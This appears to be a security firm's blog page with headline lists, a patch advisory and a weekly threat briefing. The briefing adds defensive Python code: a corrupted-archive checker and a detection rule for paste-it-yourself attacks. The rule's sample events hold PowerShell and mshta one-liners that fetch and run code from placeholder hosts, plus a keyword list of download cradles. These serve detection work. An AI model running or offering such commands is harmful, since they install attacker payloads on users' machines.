New Smartphone Warning—Forget What You’ve Been Told About Security

Chinese EagleMsgSpy Spyware Found Exploiting Mobile Devices Since 2017

Experts discovered the first mobile malware families linked to Russia's Gamaredon

Telegram founder Pavel Durov questioned in Paris court for first time: Report

Apple’s iPhone Hit By FBI Warning And Lawsuit Before iOS 18.2 Release

Denial of Service/DoS/DDoS

Europol Dismantles 27 DDoS Attack Platforms Across 15 Nations; Admins Arrested

Internet of Things – IoT

EU cyber security rules for smart devices enter into force | TechCrunch

DoD Digital Forensics: Unlocking Evidence In Cars, Wearables, And IoT

The EU Cyber Resilience Act: Enhancing Digital Security In The AI Era

Vulnerabilities in Skoda & Volkswagen Cars Let Hackers Remotely Track Users

Data Breaches/Leaks

Phishing: The Silent Precursor to Data Breaches - SecurityWeek

Deloitte Denies Breach, Claims Cyber-Attack Targeted Single Client - Infosecurity Magazine

Deloitte sues 3 partners who 'leaked secrets' to rival firm

Public Reprimands, an Effective Deterrent Against Data Breaches - Infosecurity Magazine

Salt Typhoon recorded 'very senior' US officials' calls • The Register

446,000 Impacted by Center for Vein Restoration Data Breach - SecurityWeek

Massive Data Breach Hits Senior Dating Website, Exposing Over 765,000 Users

Cyber security expert Abi Waddell hacked huntsmen to leak their names and addresses

Attackers can abuse the Windows UI Automation framework to steal data from apps | CSO Online

Cyber security Lessons From 3 Public Breaches

Over 300K Prometheus Instances Exposed: Credentials and API Keys Leaking Online

New Atrium Health data breach impacts 585,000 individuals

Thousands of children exposed in major data breach — including names, addresses and social security numbers | Tom's Guide

US Bitcoin ATM operator Byte Federal suffered a data breach

Organised Crime & Criminal Actors

Moody's: Hackers Aim for Big Payouts, Supply Chain Attacks

Recently Charged Scattered Spider Suspect Did Poor Job at Covering Tracks - SecurityWeek

Cyber crime gang arrested after turning Airbnbs into fraud centres

Russian government spies targeted Ukraine using tools developed by cyber criminals | TechCrunch

Emulating the Financially Motivated Criminal Adversary FIN7 – Part 1 - Security Boulevard

Alleged Scattered Spider hacker arrested, indicted | SC Media

Cyber security expert Abi Waddell hacked huntsmen to leak their names and addresses

Scam Kit Maker Rebuilding Business After Telegram Channel Shut Down - Security Boulevard

Cyber criminal marketplace Rydox seized in international law enforcement operation | CyberScoop

FBI Busts Rydox Marketplace with 7,600 PII Sales, Cryptocurrency Worth $225K Seized

He Investigates the Internet’s Most Vicious Hackers—From a Secret Location - WSJ

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Windows, macOS users targeted with crypto-and-info-stealing malware - Help Net Security

Radiant links $50 million crypto heist to North Korean hackers

"CP3O" pleads guilty to multi-million dollar cryptomining scheme

North Korean Group UNC4736 Blamed for Radiant Capital Breach

Compromised AI Library Delivers Cryptocurrency Miner via PyPI - Infosecurity Magazine

US Bitcoin ATM operator Byte Federal suffered a data breach

Insider Risk and Insider Threats

Employee Visits to Adult or Gambling Sites Doubles | Newswise

Deloitte sues 3 partners who 'leaked secrets' to rival firm

How To Flip the Script on the Latest Insider Threat Trends

KnowBe4 Report Finds 44% of HR Professionals Have Encountered Fraudulent or Scam Job Applications - IT Security Guru

Insurance Worker Sentenced After Illegally Accessing Claimants’ Data - Infosecurity Magazine

7 types of insider threats | University of Strathclyde

Insurance

Lloyd's of London Launches First-of-its-kind Consortium Built on HITRUST Certification to Shape the Future of Cyber Insurance

How to make your clients less attractive to cyber criminals | Insurance Business America

Supply Chain and Third Parties

Moody's: Hackers Aim for Big Payouts, Supply Chain Attacks

Blue Yonder SaaS giant breached by Termite ransomware gang

Containers are a weak link in supply chain security

Lessons From the Largest Software Supply Chain Incidents

Cloud/SaaS

Hackers are exploiting a flaw in popular file-transfer tools to launch mass hacks, again | TechCrunch

Blue Yonder SaaS giant breached by Termite ransomware gang

Who handles what? Common misconceptions about SaaS security responsibilities - Help Net Security

Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion | Trend Micro (US)

Thousands of AWS credentials stolen from misconfigured sites • The Register

Cleo Patches Exploited Flaw as Security Firms Detail Malware Pushed in Attacks - SecurityWeek

Microsoft MFA Bypassed via AuthQuake Attack  - SecurityWeek

No User Interaction, No Alerts: Azure MFA Cracked In An Hour

Outages

Microsoft 365 outage takes down Office web apps, admin center

Facebook, Instagram, WhatsApp hit by massive worldwide outage

ChatGPT and Sora experienced a major outage | TechCrunch

Russian users report Gazprombank outages amid alleged Ukrainian cyber attack | The Record from Recorded Future News

Encryption

Telegram founder Pavel Durov questioned in Paris court for first time: Report

Google says its breakthrough Willow quantum chip can’t break modern cryptography - The Verge

Apple’s iPhone Hit By FBI Warning And Lawsuit Before iOS 18.2 Release

Linux and Open Source

Open source malware surged by 156% in 2024 | ITPro

New stealthy Pumakit Linux rootkit malware spotted in the wild

Passwords, Credential Stuffing & Brute Force Attacks

Thousands of AWS credentials stolen from misconfigured sites • The Register

Over 300K Prometheus Instances Exposed: Credentials and API Keys Leaking Online

Hackers Target Global Sporting Events With Fake Domains To Steal Logins

Social Media

The EU Makes an Urgent TikTok Inquiry on Russia's Role in Romanian Election Turmoil - SecurityWeek

Federal Appeals Court Upholds Law Threatening US TikTok Ban - Infosecurity Magazine

Romania Cancels Presidential Election Results After Alleged Russian Meddling on TikTok

Massive Data Breach Hits Senior Dating Website, Exposing Over 765,000 Users

Training, Education and Awareness

Opinion: Why cyber security awareness is everyone's responsibility  | Calgary Herald

Regulations, Fines and Legislation

EU cyber security rules for smart devices enter into force | TechCrunch

The EU Makes an Urgent TikTok Inquiry on Russia's Role in Romanian Election Turmoil - SecurityWeek

Federal Appeals Court Upholds Law Threatening US TikTok Ban - Infosecurity Magazine

Why Americans must be prepared for cyber security’s worst | CyberScoop

The EU Cyber Resilience Act: Enhancing Digital Security In The AI Era

US Telco Security Efforts Ramp Up After Salt Typhoon

Experts Call for Overhaul of National Cyber Director Role

Cyprus financial sector gears up for stricter cyber security | Cyprus Mail

Models, Frameworks and Standards

The EU Cyber Resilience Act: Enhancing Digital Security In The AI Era

A Very Merry NISTmas: 2024 Updates to the Cyber Security and AI Framework | Ropes & Gray LLP - JDSupra

Understanding ISO 27001: The Backbone of Information Security Management: By Kajal Kashyap

Careers, Working in Cyber and Information Security

HR Magazine - Lock it in: How to close the cyber security training gap

What makes for a fulfilled cyber security career - Help Net Security

Law Enforcement Action and Take Downs

Recently Charged Scattered Spider Suspect Did Poor Job at Covering Tracks - SecurityWeek

Europol Dismantles 27 DDoS Attack Platforms Across 15 Nations; Admins Arrested

European Police Disrupt Phone Phishing Gang with Arrests - Infosecurity Magazine

Eight Suspected Phishers Arrested in Belgium, Netherlands - SecurityWeek

Spain busts voice phishing ring for defrauding 10,000 bank customers

Notorious Nigerian cyber criminal tied to BEC scams extradited to US | CyberScoop

Cyber criminal marketplace Rydox seized in international law enforcement operation | CyberScoop

Millionaire Airbnb Phishing Ring Busted Up by Police

"CP3O" pleads guilty to multi-million dollar cryptomining scheme

Telegram founder Pavel Durov questioned in Paris court for first time: Report

Horizon Post Office scandal: Police investigating dozens for perjury and perverting the course of justice | The Independent

Jersey police help disrupt multi-billion money laundering networks | Bailiwick Express

Misinformation, Disinformation and Propaganda

Romania Cancels Presidential Election Results After Alleged Russian Meddling on TikTok

AI fakes, cyber attacks threaten German election – DW – 12/06/2024

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Keep cash at home due to cyber attack risks, Dutch Central Bank warns – The Irish Times

NATO Offensive cyber operations exercise Crossed Swords gets underway in Tallinn

Nation State Actors

China

Salt Typhoon recorded 'very senior' US officials' calls • The Register

Counterintelligence director reveals extent of damage from China telecom hacks - Washington Times

The EU Makes an Urgent TikTok Inquiry on Russia's Role in Romanian Election Turmoil - SecurityWeek

Federal Appeals Court Upholds Law Threatening US TikTok Ban - Infosecurity Magazine

How Chinese insiders exploit its surveillance state • The Register

Compromised Software Code Poses New Systemic Risk to US Critical Infrastructure

Chinese hackers use Visual Studio Code tunnels for remote access

US Charges Chinese Hacker for Exploiting Zero-Day in 81,000 Sophos Firewalls

US Telco Security Efforts Ramp Up After Salt Typhoon

Why did China hack the world’s phone networks?

Chinese EagleMsgSpy Spyware Found Exploiting Mobile Devices Since 2017

US govt says Cisco gear often targeted in China's Salt Typhoon attacks on 8 telecommunications providers — issues Cisco-specific advice to patch networks to fend off attacks | Tom's Hardware

Romania Cancels Presidential Election Results After Alleged Russian Meddling on TikTok

As US finally details Chinese Salt Typhoon attack, FCC Chair proposes new rules for telcos

'EagleMsgSpy' Android Spyware Linked to Chinese Police

Russia

Lookout Discovers New Spyware Deployed by Russia and China - Infosecurity Magazine

Keep cash at home due to cyber attack risks, Dutch Central Bank warns – The Irish Times

The EU Makes an Urgent TikTok Inquiry on Russia's Role in Romanian Election Turmoil - SecurityWeek

Russian hacktivists target oil, gas and water sectors worldwide | SC Media

Suspected Russian hackers target Ukrainian defence enterprises in new espionage campaign | The Record from Recorded Future News

Russian government spies targeted Ukraine using tools developed by cyber criminals | TechCrunch

EU envoys to discuss first sanctions targeting Russian hybrid threats

Exploring Cyber-Darkness: How Moscow Undermines the West via the Dark Web | Geopolitical Monitor

NATO Offensive cyber operations exercise Crossed Swords gets underway in Tallinn

Gamaredon Deploys Android Spyware "BoneSpy" and "PlainGnome" in Former Soviet States

Ukraine Weighs Telegram Security Risks Amid War With Russia - The New York Times

Romania Exposes Propaganda Campaign Supporting Pro-Russian Candidate - Infosecurity Magazine

AI fakes, cyber attacks threaten German election – DW – 12/06/2024

Romania Cancels Presidential Election Results After Alleged Russian Meddling on TikTok

Experts discovered the first mobile malware families linked to Russia's Gamaredon

Threat hunting case study: Cozy Bear | Intel 471

Phishing Scam Targets Ukrainian Defence Companies - Infosecurity Magazine

Russia disconnects several regions from the global internet to test its sovereign net | TechRadar

Russia takes unusual route to hack Starlink-connected devices in Ukraine - Ars Technica

Russian users report Gazprombank outages amid alleged Ukrainian cyber attack | The Record from Recorded Future News

RedLine info-stealer campaign targets Russian businesses

North Korea

North Korea's fake IT worker scam hauled in $88 million • The Register

Radiant links $50 million crypto heist to North Korean hackers

North Korean Group UNC4736 Blamed for Radiant Capital Breach

North Korean hackers target South Korea with Internet Explorer vulnerabilities to deploy RokRAT malware | TechRadar

Tools and Controls

Who handles what? Common misconceptions about SaaS security responsibilities - Help Net Security

Security researchers set up an API honeypot to dupe hackers – and the results were startling | ITPro

Neglect of endpoints presents a major security gap for enterprises

Conquering the Complexities of Modern BCDR

Safe Handling of Data: Why Secrets Sprawl is a Risk - Security Boulevard

Why don’t security leaders get the funds they need to succeed? | SC Media

What is Cyber Threat Detection and Response? | UpGuard

US Charges Chinese Hacker for Exploiting Zero-Day in 81,000 Sophos Firewalls

Bug bounty programs: Why companies need them now more than ever | CSO Online

Cyber Security Products or Platforms - Which is More Effective? - Security Boulevard

AI is a gamble we cannot afford without cyber security

Exposed APIs and issues in the world's largest organisations - Help Net Security

WAF Vulnerability in Akamai, Cloudflare, and Imperva Affected 40% of Fortune 100 Companies

Microsoft enforces defences preventing NTLM relay attacks - Help Net Security

Businesses struggle with IT security, Kaspersky reports

Unlocking the Value of DSPM: What You Need to Know - IT Security Guru

7 Must-Know IAM Standards in 2025

Mastering PAM to Guard Against Insider Threats - Security Boulevard

The Future of Network Security: Automated Internal and External Pentesting

How to Make the Case for Network Security Audits - Security Boulevard

Strengthening security posture with comprehensive cyber security assessments - Help Net Security

Three-Quarters of Security Leaders Admit Gaps in Hardware Knowledge - Infosecurity Magazine

Generative AI's cyber security potential is clear, but so far it's given hackers the upper hand | ITPro

TPM 2.0: The new standard for secure firmware - Help Net Security

How to Improve Your Cyber Security On a Lower Budget | Mimecast

Vulnerability Management

What Is an Application Vulnerability? 8 Common Types - Security Boulevard

Containers have 600+ vulnerabilities on average - Help Net Security

Vulnerabilities

Microsoft Fixes 72 Flaws, Including Patch for Actively Exploited CLFS Vulnerability

SonicWall Patches 6 Vulnerabilities in Secure Access Gateway - SecurityWeek

Cleo Patches Exploited Flaw as Security Firms Detail Malware Pushed in Attacks - SecurityWeek

SAP Patches Critical Vulnerability in NetWeaver - SecurityWeek

Adobe Patches Over 160 Vulnerabilities Across 16 Products - SecurityWeek

Micropatching service releases fix for a zero-day vulnerability affecting three Windows generations | TechSpot

Apple Pushes Major iOS, macOS Security Updates - SecurityWeek

Apache issues patches for critical Struts 2 RCE bug • The Register

Security Flaws in WordPress Woffice Theme Prompts Urgent Update - Infosecurity Magazine

New Windows zero-day exposes NTLM credentials, gets unofficial patch

Unauthorized file access possible with chained Mitel MiCollab flaws | SC Media

New Windows Warning As Zero-Day With No Official Fix Confirmed For All Users

Ivanti Issues Critical Security Updates for CSA and Connect Secure Vulnerabilities

Microsoft Azure MFA Flaw Allowed Easy Access Bypass - Infosecurity Magazine

Multiple Ivanti CSA Vulnerabilities Let Attackers Bypass Admin Web Console Remotely

WAF Vulnerability in Akamai, Cloudflare, and Imperva Affected 40% of Fortune 100 Companies

QNAP Patches Vulnerabilities Exploited at Pwn2Own - SecurityWeek

OpenWrt supply chain attack scare prompts urgent upgrades • The Register

Atlassian, Splunk Patch High-Severity Vulnerabilities - SecurityWeek

AMD VM security tools can be bypassed, letting hackers infiltrate your devices, experts warn | TechRadar

Hunk Companion WordPress plugin exploited to install vulnerable plugins

Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.

Black Arrow Admin

Black Arrow Cyber Advisory 11 December 2024 – Microsoft, Ivanti, Adobe, and Chrome Security Updates

Executive summary

In line with Microsoft’s December Patch Tuesday, several vendors, including Ivanti, Adobe, and Google, have released security updates to fix vulnerabilities in their products. Microsoft has addressed 72 security issues, including an actively exploited elevation of privilege vulnerability in the Windows Common Log File System (CLFS) driver. Ivanti’s updates cover its Cloud Services Application (CSA), Connect Secure, Policy Secure, and Sentry products, fixing multiple critical vulnerabilities, one of which carries the maximum CVSS severity rating of 10 and allows unauthenticated remote attackers to gain administrative access. Adobe has released patches for 168 security issues across various products, including Experience Manager, Connect, Animate, and InDesign. Google has updated Chrome to fix three high-severity vulnerabilities in the browser.

What’s the risk to me or my business?

The actively exploited vulnerabilities could allow an attacker to compromise the confidentiality, integrity and availability of the affected applications and of the organisation’s data on the affected systems.

What can I do?

Black Arrow recommends applying the available security updates for all supported versions of the products affected by these vulnerabilities. Updates for actively exploited vulnerabilities, and for all other vulnerabilities with a critical or high severity rating, should be applied as soon as possible.

Microsoft

Further details on specific updates within this Microsoft patch Tuesday can be found here:

https://msrc.microsoft.com/update-guide/releaseNote/2024-Dec

Ivanti

Further details on specific updates across affected Ivanti products can be found here:

https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Cloud-Services-Application-CSA-CVE-2024-11639-CVE-2024-11772-CVE-2024-11773?language=en_US

https://forums.ivanti.com/s/article/December-2024-Security-Advisory-Ivanti-Connect-Secure-ICS-and-Ivanti-Policy-Secure-IPS-Multiple-CVEs?language=en_US

https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2024-8540?language=en_US

Adobe

Further details of the vulnerabilities in affected Adobe products can be found here under ‘Recent bulletins and advisories’:

https://helpx.adobe.com/security/security-bulletin.html

Chrome

Further details of the vulnerabilities in the Chrome Browser products can be found here:

https://chromereleases.googleblog.com/2024/12/stable-channel-update-for-desktop_10.html

#threatadvisory #threatintelligence #cybersecurity


Black Arrow Admin

Black Arrow Cyber Threat Intelligence Briefing 06 December 2024

Black Arrow Cyber Threat Intelligence Briefing 06 December 2024:

-Generative AI Makes Phishing Attacks More Believable and Cost-Effective

-Nearly Half a Billion Emails to Businesses Contain Malicious Content

-65% of Office Workers Bypass Cyber Security to Boost Productivity

-Cyber Warfare Rising Across EU in Bid to 'Destabilise' Member States

-INTERPOL Arrests 5,500 in Global Cyber Crime Crackdown, Seizes Over $400 Million

-Hackers Use Corrupted ZIPs and Office Docs to Evade Antivirus and Email Defences

-Russian Money Laundering Networks Uncovered Linking Narco Traffickers, Ransomware Gangs and Kremlin Spies

-UK Underestimates Threat of Cyber Attacks from Hostile States and Gangs

-Why You Must Beware of Dangerous New Scam-Yourself Cyber Attacks

-Security Must Be Used as a Springboard, Not Just a Shield

-Why Your Cyber Insurance May Not Cover Everything: Finding and Fixing Blind Spots

-Cyber Criminals Already Using AI for Most Types of Scams, FBI Warns

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Top Cyber Stories of the Last Week

Generative AI Makes Phishing Attacks More Believable and Cost-Effective

In a survey of 14,500 executives, IT and security professionals, and office workers, Ivanti found that phishing is the top threat that is increasing due to generative AI. Training is a vital element of security, and although 57% of organisations say they use anti-phishing training to protect themselves from sophisticated social engineering attacks, only 32% believe that such training is “very effective”. Lack of skills is a major challenge for one in three security professionals. Real-time, accessible data is essential, yet 72% of IT and security data remains siloed.

Nearly Half a Billion Emails to Businesses Contain Malicious Content

A report by Hornetsecurity shows that over a third of all business emails in 2024 were unwanted, with 2.3% (around 427.8 million) containing malicious content. Phishing drove a third of all cyber attacks, while malicious URLs accounted for nearly a quarter. Reverse-proxy credential theft rose, using links instead of file attachments. Shipping brands like DHL and FedEx were the most impersonated. The data underscores the need for a zero-trust mindset and improved user awareness to strengthen defences against increasingly sophisticated threats.

65% of Office Workers Bypass Cyber Security to Boost Productivity

CyberArk found that 65% of office staff circumvent policies to improve their productivity, with half frequently reusing passwords and nearly a third sharing credentials. Over a third ignore important updates, and many use AI tools, often feeding sensitive data without adhering to guidelines. Senior executives are twice as likely to fall victim to phishing. The findings highlight the urgent need for identity-focused security strategies that enable efficient work while reducing risk.

Cyber Warfare Rising Across EU in Bid to 'Destabilise' Member States

EU cyber body ENISA reports a surge in hostile cyber activity across Europe, warning that escalating espionage, sabotage, violence, and disinformation threaten essential services and strategic interests. A successful attack on Europe’s key supply chains could have catastrophic cascading effects. Germany has formed a new task force to counter these threats before the federal election, while the UK’s national cyber agency confirms increased and more sophisticated hostile activity. Russia and China remain prominent cyber espionage threats. ENISA rates the threat to EU entities as “substantial”, as malicious cyber activity is deployed to manipulate events, destabilise societies, and undermine EU democracy and values.

INTERPOL Arrests 5,500 in Global Cyber Crime Crackdown, Seizes Over $400 Million

INTERPOL’s latest global cyber crime crackdown led to over 5,500 arrests and seized more than $400 million in assets. Involving 40 countries, it dismantled a voice phishing operation that stole $1.1 billion from over 1,900 victims. Criminals impersonated law enforcement, exploiting digital currencies and undermining trust in financial systems. INTERPOL also warned of new scams using stablecoins and romance-themed lures to drain victims’ wallets. These results highlight the urgent need for international collaboration to counter large-scale cyber crime and protect individuals, businesses, and the integrity of digital economies.

Hackers Use Corrupted ZIPs and Office Docs to Evade Antivirus and Email Defences

A new phishing campaign is using deliberately corrupted ZIP archives and Office documents to bypass email security measures. Since August 2024, attackers have been sending files that are too damaged for security scanners to parse, but that Word and other popular applications repair and open using their built-in recovery features. Users are lured with false promises such as employee benefits, and once opened, the documents present QR codes that redirect victims to malicious websites. The files slip past most security filters while appearing to the user to function normally. This highlights how attackers continually search for new techniques to evade cyber security tools and compromise organisations’ systems and data.
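As an added illustration of the check a mail gateway or sandbox can apply against this technique (example code written for this briefing, not taken from the original report): Office 2007+ documents are ZIP containers, so an attachment that claims to be an archive or an Office file but whose ZIP structure cannot be parsed, or whose members fail their CRC check, should be treated as suspicious rather than passed through as “unscannable”. The sample document, the truncation and the byte flip below are constructed for the demonstration, and the file names are hypothetical.

```python
import io
import zipfile
import zlib

OFFICE_EXTENSIONS = (".docx", ".xlsx", ".pptx")
ARCHIVE_EXTENSIONS = (".zip",) + OFFICE_EXTENSIONS


def classify_attachment(name: str, data: bytes) -> str:
    """Return 'ignored', 'clean' or 'suspicious: <reason>' for one attachment.

    Office 2007+ documents are ZIP containers, so both file families share
    the same structural checks. Anything that claims to be an archive but
    cannot be parsed is treated as suspicious rather than unscannable.
    """
    lower = name.lower()
    if not lower.endswith(ARCHIVE_EXTENSIONS):
        return "ignored"
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            # Read every member and verify its CRC; a damaged member is what a
            # scanner silently skips but a document recovery routine repairs.
            try:
                bad = zf.testzip()
            except (zipfile.BadZipFile, zlib.error, EOFError, RuntimeError):
                bad = "<unreadable member>"
            if bad is not None:
                return f"suspicious: entry fails integrity check ({bad})"
            if lower.endswith(OFFICE_EXTENSIONS) and "[Content_Types].xml" not in zf.namelist():
                return "suspicious: Office container missing [Content_Types].xml"
            return "clean"
    except zipfile.BadZipFile:
        # No readable central directory: truncated or deliberately damaged.
        return "suspicious: unreadable archive structure"


def build_sample_docx(body: str) -> bytes:
    """Constructed minimal OOXML-style container for the demo; not a real Word file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_STORED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", f"<w:document>{body}</w:document>")
    return buf.getvalue()


def drop_end_of_central_directory(data: bytes) -> bytes:
    """Truncate the 22-byte end-of-central-directory record (empty comment)."""
    return data[:-22]


def corrupt_stored_entry(data: bytes, marker: bytes) -> bytes:
    """Flip one byte inside an uncompressed member so its CRC no longer matches."""
    idx = data.find(marker)
    if idx < 0:
        raise ValueError("marker not found")
    mutated = bytearray(data)
    mutated[idx] ^= 0xFF
    return bytes(mutated)


if __name__ == "__main__":
    good = build_sample_docx("quarterly benefits update")
    for label, blob in [
        ("intact", good),
        ("truncated", drop_end_of_central_directory(good)),
        ("bit-flipped", corrupt_stored_entry(good, b"<Types/>")),
    ]:
        print(f"{label:12} -> {classify_attachment('benefits.docx', blob)}")
```

The design choice worth noting is the default: a parse failure on a file that claims to be a ZIP or Office document is a verdict, not an error. Gateways that treat unparseable attachments as “nothing to scan” are exactly what this campaign relies on.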

Russian Money Laundering Networks Uncovered Linking Narco Traffickers, Ransomware Gangs and Kremlin Spies

British authorities uncovered a vast Russian-linked money laundering system connecting drug traffickers, cyber criminals and sanctioned elites, resulting in over 80 arrests worldwide. This billion-dollar operation relied on two Moscow-based firms to shift value across 30 countries using cryptocurrency, property and other assets. More than £20 million in cash and cryptocurrency has already been seized. New sanctions target senior figures behind the networks, aiming to disrupt their access to global financial systems. The investigation revealed that narcotics gangs, Russian state-linked espionage activities and cyber criminals all benefited, posing a significant threat to global security and financial stability.

UK Underestimates Threat of Cyber Attacks from Hostile States and Gangs

The UK’s National Cyber Security Centre (NCSC) warns organisations are underestimating state and criminal cyber threats. Hostile activities have increased, with severe incidents trebling to 12 last year. Ransomware attacks remain a major concern, targeting sectors from academia to healthcare. The centre responded to 430 serious incidents, up from 371 previously. Russia’s “aggression and recklessness” and China’s “sophisticated” attacks highlight how critical national infrastructure and key services remain vulnerable. The call is clear: organisations must strengthen defences to address these evolving threats, which pose a growing risk to both economic stability and public services.

Why You Must Beware of Dangerous New Scam-Yourself Cyber Attacks

The latest report from cyber security provider Gen shows a 614% quarterly rise in ‘scam-yourself’ cyber attacks, where victims unwittingly paste malicious code themselves. Tactics include fake tutorials, deceptive tech support, false CAPTCHA prompts and bogus updates. This spike coincides with a 39% surge in data-stealing malware and a 1154% increase in a popular information stealer. Such threats are reshaping the landscape, catching millions off-guard and driving urgent attention to robust cyber security solutions. Business leaders must foster greater awareness and invest in proactive, multilayered cyber security strategies to protect their organisations.
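As an added example of a detection rule for this “paste it yourself” pattern (written for this briefing, not from the Gen report): the commands a victim is told to paste are typically run from the Windows Run dialog or a terminal opened from the desktop, so the interpreter’s parent process is explorer.exe and the command line carries a download-and-execute cue. The process-creation log lines below are constructed for the demonstration in an assumed `parent=|image=|cmdline=` format; the cue list and the parent-process assumption are the editor’s, not the report’s, and the domains are placeholders.

```python
import re
from dataclasses import dataclass
from typing import List

# Shell processes from which a user-pasted command is launched (assumption:
# the Run dialog and desktop-spawned terminals have explorer.exe as parent).
INTERACTIVE_PARENTS = {"explorer.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Command-line fragments typical of a one-liner that fetches and runs a payload.
DOWNLOAD_CUES = re.compile(
    r"invoke-webrequest|\biwr\b|\birm\b|invoke-expression|\biex\b|downloadstring"
    r"|mshta\s+https?://|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden",
    re.IGNORECASE,
)


@dataclass
class ProcessEvent:
    parent: str
    image: str
    cmdline: str


def parse_event(line: str) -> ProcessEvent:
    """Parse one constructed 'parent=...|image=...|cmdline=...' log line."""
    parent, image, cmdline = line.split("|", 2)
    return ProcessEvent(
        parent=parent.partition("=")[2],
        image=image.partition("=")[2],
        cmdline=cmdline.partition("=")[2],
    )


def basename(path: str) -> str:
    """Lower-cased final path component, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_scam_yourself_execution(ev: ProcessEvent) -> bool:
    """True when an interactive shell launches an interpreter with a download cue."""
    return (
        basename(ev.parent) in INTERACTIVE_PARENTS
        and basename(ev.image) in INTERPRETERS
        and DOWNLOAD_CUES.search(ev.cmdline) is not None
    )


def scan(lines: List[str]) -> List[str]:
    """Return the command lines that match the pattern, in input order."""
    return [ev.cmdline for ev in map(parse_event, lines) if is_scam_yourself_execution(ev)]


# Constructed sample events; domains are placeholders, not real infrastructure.
SAMPLE_EVENTS = [
    r"parent=C:\Windows\explorer.exe|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r'|cmdline=powershell -w hidden -c "iex (irm https://captcha.example.invalid/verify)"',
    r"parent=C:\Windows\System32\svchost.exe|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|cmdline=powershell -File C:\Scripts\nightly-backup.ps1",
    r"parent=C:\Windows\explorer.exe|image=C:\Windows\System32\cmd.exe|cmdline=cmd /c dir C:\Users",
    r"parent=C:\Windows\explorer.exe|image=C:\Windows\System32\mshta.exe"
    r"|cmdline=mshta https://update.example.invalid/fix.hta",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print("ALERT:", hit)
```

Only the first and last sample events fire: the scheduled backup has a service parent and no download cue, and a plain `dir` from the desktop has an interactive parent but no cue. Tune the cue list and the parent set to your own telemetry before relying on it.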

Security Must Be Used as a Springboard, Not Just a Shield

Many organisations still view cyber security as a necessary expense rather than a growth catalyst. Research suggests that embracing it as a strategic enabler can boost productivity, build customer trust, and strengthen competitiveness. It found that nearly half of surveyed organisations suffered more than 12 hours of downtime after a cyber attack, with a third experiencing a full day’s disruption. As more connected environments emerge, security leaders must highlight metrics like uptime and customer satisfaction to board members. By doing so, cyber security becomes a driver of operational resilience and long-term success, not just a shield against threats.

Why Your Cyber Insurance May Not Cover Everything: Finding and Fixing Blind Spots

Only 1% of organisations recently surveyed received full reimbursement from their cyber insurance, and the average payout covered just 63% of incurred costs. Nearly half lacked clarity about what their policies covered. Common shortfalls arose when remediation expenses exceeded coverage limits or were not pre-approved, and when required security measures were not fully implemented. Strengthening cyber security practices increased the likelihood of better coverage, with more than three-quarters seeing improved terms after boosting cyber defences. Involving IT and security teams in insurance decisions and improving internal protections can help deliver more comprehensive and cost-effective cyber insurance in the future.

Cyber Criminals Already Using AI for Most Types of Scams, FBI Warns

The FBI warns that cyber criminals increasingly use generative AI to create believable text, images, audio, and video. This allows them to scale their cyber crime operations and trick victims by avoiding usual warning signs. Criminals impersonate trusted individuals, forge identification, and run convincing investment or donation scams. The FBI suggests using a secret word with loved ones, being cautious with personal details, and watching for subtle inconsistencies. Confirm unsolicited calls or messages by independently contacting banks or authorities, and limit sharing personal images or voice recordings online as a precaution.

Sources:

https://www.helpnetsecurity.com/2024/12/06/genai-phishing-attacks-concerns/

https://www.prnewswire.com/news-releases/nearly-half-a-billion-emails-to-businesses-contain-malicious-content-hornetsecurity-report-finds-302321390.html

https://www.helpnetsecurity.com/2024/12/04/employees-privileged-access-security-risk/

https://www.irishexaminer.com/news/arid-41529398.html

https://thehackernews.com/2024/12/interpol-arrests-5500-in-global.html

https://thehackernews.com/2024/12/hackers-use-corrupted-zips-and-office.html

https://therecord.media/russian-money-laundering-networks-trafficking-cybercrime-kremlin

https://www.theguardian.com/technology/2024/dec/03/uk-underestimates-threat-of-cyber-attacks-from-hostile-states-and-gangs-says-security-chief

https://www.forbes.com/sites/daveywinder/2024/12/02/why-you-must-beware-of-dangerous-new-scam-yourself-cyber-attacks/

https://betanews.com/2024/11/29/security-must-be-used-as-a-springboard-not-just-a-shield/

https://www.scworld.com/resource/why-your-cyber-insurance-may-not-cover-everything-finding-and-fixing-blind-spots

https://cybernews.com/security/cybercriminals-using-ai-for-most-types-of-scams-fbi/

Threats

Ransomware, Extortion and Destructive Attacks

Ransomware Strikes when Organisations Unknowingly Open the Door | Security Info Watch

Does Cyber Insurance Drive Up Ransom Demands?

